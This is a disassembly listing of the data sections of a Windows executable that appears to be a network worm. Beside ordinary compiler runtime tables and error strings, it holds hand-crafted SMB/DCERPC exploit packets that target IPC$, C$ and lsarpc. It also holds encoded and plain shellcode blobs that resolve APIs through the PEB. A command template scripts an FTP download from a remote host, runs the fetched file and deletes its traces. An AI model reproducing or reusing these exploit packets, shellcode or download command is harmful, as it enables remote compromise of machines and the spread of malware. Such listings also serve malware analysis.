dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dd 34h dup(0)
dbl_427568 dq 9.765625e-4 ; DATA XREF: .text:0040500A�r
; .text:00405025�r ...
dd 2 dup(0)
dbl_427578 dq -3.0517578125e-5 ; DATA XREF: sub_411CB1+1E�r
dd 0
dd offset dword_427EB0
off_427588 dd offset sub_41576B ; DATA XREF: sub_415573+4D�o
; sub_415787+C�o
dd offset sub_415631
dd offset sub_41574E
aStringTooLong db 'string too long',0 ; DATA XREF: sub_415573+1E�o
dd offset dword_427EE8
off_4275A8 dd offset sub_415698 ; DATA XREF: sub_4155CD+4E�o
; sub_41565B+11�o ...
dd offset sub_415631
dd offset sub_41563E
dd offset dword_427F38
off_4275B8 dd offset sub_415853 ; DATA XREF: sub_41579F+4D�o
; sub_41586F+C�o
dd offset sub_415631
dd offset sub_415836
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_41579F+1E�o
align 10h
dbl_4275E0 dq 1.0 ; DATA XREF: sub_415D9B+6C�r
; sub_415EF3+6C�r ...
dword_4275E8 dd 0FFFFFFFFh, 417FA7h, 417FBBh, 427F68h ; DATA XREF: sub_417ED0+5�o
off_4275F8 dd offset sub_418020 ; DATA XREF: .text:00418019�o
; sub_41803C+8�o ...
dd offset sub_4180F8
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_4180F8+7�o
align 4
dd offset dword_427FB0
off_427618 dd offset sub_41811A ; DATA XREF: sub_418105�o
; .text:00418192�o ...
align 10h
dword_427620 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4181A0+E�o
dd 3, 19930520h, 2 dup(0)
dd 6E795Fh, 31795Fh, 30795Fh, 78657266h, 70h, 646F6D66h
dd 0
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: .data:off_435AD4�o
dbl_4276F0 dq 0.0 ; DATA XREF: sub_4196BA+8C�r
; sub_4196BA+AC�r ...
dbl_4276F8 dq 4.195835e6 ; DATA XREF: sub_419C33+F�r
dbl_427700 dq 3.145727e6 ; DATA XREF: sub_419C33+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_419C71+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_419C71�o
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_419D98+93�o
align 4
dword_427738 dd 0FFFFFFFFh, 41A483h, 41A48Dh, 0 ; DATA XREF: sub_41A41C+5�o
dword_427748 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41A54B+5�o
dd offset sub_41A609
align 8
dd offset sub_41A5E7
dd offset sub_41A5F1
dword_427760 dd 0FFFFFFFFh, 41A839h, 41A83Dh, 0 ; DATA XREF: sub_41A681+5�o
dword_427770 dd 0FFFFFFFFh, 41A89Bh, 41A8A4h, 0 ; DATA XREF: sub_41A845+5�o
dword_427780 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41A91C+5�o
dd offset loc_41A96D
align 10h
byte_427790 db 59h ; DATA XREF: sub_41AAED+4A�r
db 0A9h, 41h, 0
dd offset loc_41A95D
dword_427798 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41A982+5�o
dd offset loc_41A9D3
align 8
dd offset loc_41A9BF
dd offset loc_41A9C3
byte_4277B0 db 6 ; DATA XREF: sub_41AAED:loc_41AB44�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_435C1C�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_435C18�o
align 4
dword_427824 dd 0 ; DATA XREF: sub_41CC29+36�o
; sub_41EACD+39�o ...
dword_427828 dd 0FFFFFFFFh, 41CD39h, 41CD3Dh, 0FFFFFFFFh, 41CDEDh, 41CDF1h
; DATA XREF: sub_41CC29+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_43613C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41D965+119�o
align 10h
asc_427AF0 db 0Ah ; DATA XREF: sub_41D965+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41D965+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_41D965+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41D965+7D�o
align 10h
dword_427B30 dd 0FFFFFFFFh, 41EBC6h, 41EBCAh ; DATA XREF: sub_41EACD+5�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_41F1B2+A�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_41F80A+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_41F80A+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_41F80A+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_41FF41:loc_420036�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_41FF41+D8�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_41FF41+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_41FF41+AD�o
align 10h
dword_427BD0 dd 0FFFFFFFFh, 420C98h, 420C9Ch, 0FFFFFFFFh, 420D07h, 420D0Bh
; DATA XREF: sub_420AE1+5�o
dd 98h dup(0)
off_427E48 dd offset off_4359E8 ; DATA XREF: .rdata:00427E98�o
; .rdata:00427ECC�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_427E60 dd offset off_435A00 ; DATA XREF: .rdata:00427E94�o
; .rdata:00427EC8�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_427E78 dd offset off_435A20 ; DATA XREF: .rdata:00427E90�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427E78
dd offset off_427E60
dd offset off_427E48
dword_427E9C dd 3 dup(0) ; DATA XREF: .rdata:00427EC0�o
dd 3, 427E90h
dword_427EB0 dd 3 dup(0) ; DATA XREF: .rdata:00427584�o
dd offset off_435A20
dd offset dword_427E9C+4
align 8
dd offset off_427E60
dd offset off_427E48
dword_427ED0 dd 4 dup(0) ; DATA XREF: .rdata:00427EF8�o
dd 2, 427EC8h
dword_427EE8 dd 3 dup(0) ; DATA XREF: .rdata:004275A4�o
dd offset off_435A00
dd offset dword_427ED0+8
align 10h
off_427F00 dd offset off_435A40 ; DATA XREF: .rdata:00427F18�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427F00
dd offset off_427E60
dd offset off_427E48
dd 0
db 0 ; DATA XREF: .rdata:00427F48�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 427F18h
dword_427F38 dd 3 dup(0) ; DATA XREF: .rdata:004275B4�o
dd offset off_435A40
dd offset unk_427F28
dd offset off_427E48
dword_427F50 dd 4 dup(0) ; DATA XREF: .rdata:00427F78�o
dd 1, 427F4Ch, 3 dup(0)
dd offset off_4359E8
dd offset dword_427F50+8
align 10h
off_427F80 dd offset off_435AA8 ; DATA XREF: .rdata:00427F98�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427F80
dword_427F9C dd 3 dup(0) ; DATA XREF: .rdata:00427FC0�o
dd 1, 427F98h
dword_427FB0 dd 3 dup(0) ; DATA XREF: .rdata:00427614�o
dd offset off_435AA8
dd offset dword_427F9C+4
dd 53h dup(0)
dword_428110 dd 19930520h, 2, 428130h, 5 dup(0) ; DATA XREF: .text:loc_4250A3�o
dd 0FFFFFFFFh, 42508Ch, 0
dd offset sub_425084
dd 2 dup(0)
dword_428148 dd 19930520h, 2, 428168h, 5 dup(0) ; DATA XREF: .text:loc_4250C8�o
dd 0FFFFFFFFh, 4250B8h, 0
dd offset sub_4250C0
align 10h
dword_428180 dd 19930520h, 2, 4281A0h, 1, 4281B0h, 3 dup(0)
; DATA XREF: .text:loc_4250D8�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 4281C8h, 4 dup(0)
dd offset loc_402A7D
dd 3 dup(0)
dd offset off_4359E8
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 418079h, 2 dup(0)
dd offset off_435A00
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 4156B4h, 2 dup(0)
dd offset off_435A20
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 415787h, 0
dword_428240 dd 3, 428220h, 428200h, 4281E0h ; DATA XREF: .rdata:0042825C�o
dword_428250 dd 0 ; DATA XREF: sub_415573+47�o
; sub_41574E+12�o
dd offset sub_415711
dd 0
dd offset dword_428240
dword_428260 dd 19930520h, 1, 428280h, 5 dup(0) ; DATA XREF: .text:loc_4250EC�o
dd 0FFFFFFFFh, 4250E4h
dword_428288 dd 19930520h, 1, 4282A8h, 5 dup(0) ; DATA XREF: .text:loc_425100�o
dword_4282A8 dd 0FFFFFFFFh, 4250F8h, 2, 428200h, 4281E0h, 0 ; DATA XREF: .rdata:004282CC�o
dword_4282C0 dd 0 ; DATA XREF: sub_41563E+12�o
dd offset sub_41565B
dd 0
dd offset dword_4282A8+8
dword_4282D0 dd 19930520h, 1, 4282F0h, 5 dup(0) ; DATA XREF: .text:loc_425114�o
dd 0FFFFFFFFh, 42510Ch
dword_4282F8 dd 19930520h, 1, 428318h, 5 dup(0) ; DATA XREF: .text:loc_425128�o
dd 0FFFFFFFFh, 425120h
dword_428320 dd 19930520h, 1, 428340h, 5 dup(0) ; DATA XREF: .text:loc_42513C�o
dd 0FFFFFFFFh, 425134h, 0
dd offset off_435A40
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 41586Fh, 0
dword_428368 dd 3, 428348h, 428200h, 4281E0h ; DATA XREF: .rdata:00428384�o
dword_428378 dd 0 ; DATA XREF: sub_41579F+47�o
; sub_415836+12�o
dd offset sub_4157F9
dd 0
dd offset dword_428368
dword_428388 dd 19930520h, 1, 4283A8h, 5 dup(0) ; DATA XREF: .text:loc_425150�o
dd 0FFFFFFFFh, 425148h
dword_4283B0 dd 19930520h, 1, 4283D0h, 5 dup(0) ; DATA XREF: .text:loc_425164�o
dd 0FFFFFFFFh, 42515Ch, 74000000h, 309h dup(0)
_rdata ends
; Section 3. (virtual address 00029000)
; Virtual size : 0006C000 ( 442368.)
; Section size in file : 0006C000 ( 442368.)
; Offset to raw data for section: 00029000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 429000h
dword_429000 dd 41h dup(0) ; DATA XREF: sub_4177E0+1F�o
dd offset sub_402B66
dd offset sub_415887
dd 41h dup(0)
dword_429210 dd 41h dup(0) ; DATA XREF: sub_4177E0+1A�o
dword_429314 dd 41h dup(0) ; DATA XREF: sub_4177E0+10�o
dd offset sub_4167F2
dd offset sub_41CAB9
dd offset sub_41E5E8
dd 41h dup(0)
dd offset sub_41DB2F
dd 40h dup(0)
dword_42962C dd 41h dup(0) ; DATA XREF: sub_4177E0:loc_4177EB�o
dword_429730 dd 41h dup(0) ; DATA XREF: sub_41784D+65�o
dd offset sub_41E68D
dd 40h dup(0)
dword_429938 dd 41h dup(0) ; DATA XREF: sub_41784D:loc_4178AD�o
dword_429A3C dd 41h dup(0) ; DATA XREF: sub_41784D+76�o
dd offset sub_41DB40
dd 40h dup(0)
dword_429C44 dd 43h dup(0) ; DATA XREF: sub_41784D:loc_4178BE�o
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_401A18+B2�o
align 4
dword_429D5C dd 10FF8h, 0 ; DATA XREF: sub_401A18+6A�o
dword_429D64 dd 10FF8h ; DATA XREF: sub_401A18+79�o
dword_429D68 dd 7FFDF020h, 0 ; DATA XREF: sub_401A18+162�o
dword_429D70 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_401F4B+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_429DF8 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_401F4B+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_429E28 dd 0 ; DATA XREF: sub_401F4B+44�o
dd 800000D4h, 0
unk_429E34 db 81h ; ; DATA XREF: sub_40205B+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 10h
byte_429E80 db 41h ; DATA XREF: sub_402120+107�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
aSvwfbA db 'SVWf',0 ; DATA XREF: sub_402413+80�o
aIcsa db '',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_42A02C dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: sub_402413+30�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dd 2Ch dup(0)
dword_42A16C dd 23h ; DATA XREF: sub_4019A7+1B�o
; sub_4087B3+799�o
dword_42A170 dd 60h ; DATA XREF: sub_401A18+320�o
dword_42A174 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_401A18+2F5�o
dword_42A180 dd 30h ; DATA XREF: sub_401A18+2CA�o
; .data:0042CC44�o
dword_42A184 dd 0A1h ; DATA XREF: sub_401A18+29F�o
dword_42A188 dd 3 ; DATA XREF: sub_401A18+246�o
aCccc db 'CCCC',0 ; DATA XREF: sub_401A18+153�o
align 4
dword_42A194 dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_401A18+E8�o
aSS_ db '%s// %s.',0 ; DATA XREF: sub_402413+1CE�o
align 4
aCmdKEchoOpenSD db 'cmd /k echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: sub_402413+55�o
db 'echo quit >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
dd 7 dup(0)
dd 4B5B10EBh, 0B966C933h, 34800125h, 0FAE2990Bh, 0EBE805EBh
dd 70FFFFFFh, 99999962h, 0A938FDC6h, 12999999h, 0E91295D9h
dd 0F1123485h, 0F36E1291h, 271C09Dh, 7B999999h, 0ABAAF160h
dd 0EEF19999h, 0CDC6ABEAh, 71128F66h, 71C09DF3h, 9999991Bh
dd 7518607Bh, 99999809h, 9898F1CDh, 0CF669999h, 0C9C9C989h
dd 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h, 0F1989999h, 4B9D999Bh
dd 89F35512h, 0CF66CAC8h, 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh
dd 0CD751AA9h, 0F3BDA514h, 7B32C08Ch, 0BDDD5F64h, 0DD67DD89h
dd 0C510A4BDh, 0C510D1BDh, 0C510D5BDh, 0DD14C9BDh, 0C9CD89BDh
dd 0F3C8C8C8h, 66C8C898h, 66C8A9EFh, 55129DCFh, 0A86666F3h
dd 0CA91CF66h, 6685CF66h, 0CFC895CFh, 12A5DC12h, 9AE1B1CDh
dd 0EB12CB4Ch, 0AA6C9AB9h, 34D8D050h, 42AA5C9Ah, 0A3892796h
dd 5891ED4Fh, 439A9452h, 0A26872D9h, 0C37EEC86h, 9ABDC312h
dd 9512FF44h, 85C312D2h, 9D12449Ah, 325C9A12h, 715AC0C7h
dd 66666699h, 7597D717h, 8F2A67EBh, 579C4034h, 0F9795776h
dd 0A2657452h, 346C9040h, 0F9336075h, 0E05FE07Eh, 0
dword_42A378 dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
; DATA XREF: sub_402D46+156�o
; sub_402D46+212�o
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh
dword_42A428 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_402D46+105�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_42A510 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0040330A�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_0 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_0 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_0 db ' LM 0.12',0
align 4
dword_42A59C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00403336�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_42A648 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040335D�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_42A728 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_402D46+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_1: ; DATA XREF: sub_402D46+8A�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_42A78C dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_402D46+2AA�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_42A7F8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_402D46+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42A89C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_402D46+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_42A91C dd offset byte_401495 ; DATA XREF: sub_402D46+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_42A9B0 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
